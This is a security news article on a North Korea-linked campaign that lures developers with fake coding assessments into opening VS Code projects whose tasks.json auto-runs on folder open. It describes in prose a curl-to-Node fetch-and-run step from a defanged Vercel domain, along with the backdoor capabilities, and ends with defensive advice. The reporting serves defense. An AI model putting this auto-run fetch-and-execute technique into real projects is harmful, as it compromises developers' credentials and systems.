North Korea-Linked Hackers Target Developers via Malicious VS Code Projects
#Security

North Korea-Linked Hackers Target Developers via Malicious VS Code Projects

Security Reporter
5 min read

A sophisticated cyber espionage campaign is using fake job assessments to trick developers into cloning malicious VS Code projects, delivering backdoors that can steal credentials, cryptocurrency, and source code.

North Korean threat actors have refined their tactics to target software developers through a seemingly legitimate job application process. The latest iteration of the "Contagious Interview" campaign involves luring developers with coding assessments that require cloning and opening malicious Visual Studio Code (VS Code) projects, ultimately delivering sophisticated backdoor malware.

The attack chain begins when a developer is approached—often via LinkedIn or professional networks—by someone posing as a recruiter or technical lead. They share a repository link hosted on platforms like GitHub, GitLab, or Bitbucket, claiming it's part of a technical assessment. When the developer clones the repository and opens it in VS Code, the project's task configuration file (tasks.json) is automatically processed, executing embedded malicious commands.

How the VS Code Exploitation Works

The core of the attack abuses VS Code's task automation system. The tasks.json file contains a configuration that runs automatically when the project folder is opened, thanks to the "runOn": "folderOpen" setting. This triggers a command sequence that fetches and executes a JavaScript payload from a remote server.

On macOS systems, the command uses nohup bash -c combined with curl -s to retrieve a JavaScript payload from a Vercel domain (like ip-regions-check.vercel[.]app) and pipe it directly into the Node.js runtime. The nohup command ensures execution continues even if VS Code is closed, while curl -s suppresses output, making the activity harder to detect.

The JavaScript payload establishes a persistent execution loop that harvests basic host information and communicates with a remote command-and-control (C2) server. In observed cases, the script beacons to the server every five seconds, ready to execute additional JavaScript instructions received from the operator. The malware can also erase traces of its activity upon receiving a specific signal.

Multi-Stage Payloads and Fallback Mechanisms

The campaign has evolved to include sophisticated multi-stage droppers. In some variants, threat actors conceal malicious code within what appears to be a harmless spell-check dictionary file. This serves as a fallback mechanism if the primary payload cannot be retrieved from the Vercel domain.

The final stage typically delivers either BeaverTail (a Node.js-based backdoor) or InvisibleFerret (a Python-based data stealer). BeaverTail focuses on establishing persistence, system fingerprinting, and remote code execution. InvisibleFerret extends the attack by:

  • Logging keystrokes
  • Taking screenshots
  • Scanning the home directory for sensitive files
  • Substituting wallet addresses in the clipboard
  • Extracting credentials from web browsers
  • Establishing persistent remote connections

In some cases, the attackers also deploy XMRig cryptocurrency miners or tools like AnyDesk for remote access.

AI-Assisted Malware Development

Security researchers have noted that the malware code shows signs of being AI-assisted. The JavaScript payload contains inline comments and phrasing that suggest the use of AI tools for code generation. This could enable the threat actors to rapidly iterate on their malware, changing delivery methods and payloads quickly to evade detection.

Jaron Bradley, director of Jamf Threat Labs, noted that "the payload we observed for macOS was written purely in JavaScript and had many signs of being AI assisted. It's difficult to know exactly how quickly attackers are changing their workflows, but this particular threat actor has a reputation for adapting quickly."

Why Developers Are Targeted

North Korean threat actors specifically target software engineers, particularly those working in cryptocurrency, blockchain, and fintech sectors. These professionals often have privileged access to financial assets, digital wallets, and critical technical infrastructure. Compromising their systems could provide unauthorized access to:

  • Source code and intellectual property
  • Internal systems and networks
  • Digital assets and cryptocurrency wallets
  • Sensitive corporate data

These capabilities align with the DPRK's broader cyber espionage and financial goals, supporting the heavily-sanctioned regime through theft and intellectual property acquisition.

Additional Attack Vectors

The campaign isn't limited to VS Code projects. Security researchers have identified multiple parallel delivery methods:

  1. Malicious npm packages: Attackers may instruct victims to install a malicious npm dependency named "grayavatar"
  2. Notion-based lures: Some attacks use Notion.so pages containing technical assessments with links to malicious repositories
  3. Multi-tool deployment: After initial compromise, the malware can deploy Python environments, cryptocurrency miners, keyloggers, and remote access tools

Defensive Recommendations

Developers and security teams should implement the following precautions:

For Individual Developers

  • Verify repository sources: Only clone repositories from trusted, verified sources. Be skeptical of unsolicited coding assessments
  • Review before opening: Examine the tasks.json file and other configuration files before opening a project in VS Code
  • Check npm packages: Only install vetted npm packages from official registries
  • Use isolated environments: Consider using containerized or sandboxed environments for testing unknown code
  • Enable VS Code security settings: Configure VS Code to prompt for trust before automatically processing tasks

For Organizations

  • Implement code review policies: Require security review for all external code repositories used in assessments
  • Monitor developer systems: Deploy endpoint detection and response (EDR) solutions that can detect unusual Node.js or Python activity
  • Network monitoring: Look for connections to suspicious Vercel domains or other unexpected external hosts
  • Developer training: Educate developers about social engineering tactics and the risks of unsolicited coding tests
  • Supply chain security: Implement software composition analysis (SCA) tools to detect malicious dependencies

Broader Implications

This campaign highlights how state-sponsored actors are increasingly integrating with legitimate developer workflows. By exploiting trusted tools like VS Code and platforms like GitHub, they can bypass traditional security controls that might flag more overtly malicious activities.

The rapid evolution of these tactics—from simple repository lures to sophisticated multi-stage payloads with AI-assisted code generation—demonstrates the adaptive nature of advanced persistent threats (APTs). Security teams must stay informed about these evolving techniques and adjust their defenses accordingly.

For more detailed technical analysis, refer to the Jamf Threat Labs report and the OpenSourceMalware disclosure.

Featured image

CrashFix Chrome Extension Delivers ModeloRAT Using ClickFix-Style Browser Crash Lures

n8n Supply Chain Attack Abuses Community Nodes to Steal OAuth Tokens

#VS Code#Malware#Developer Security#APT#AI-assisted

Comments

Loading comments...
Back to Home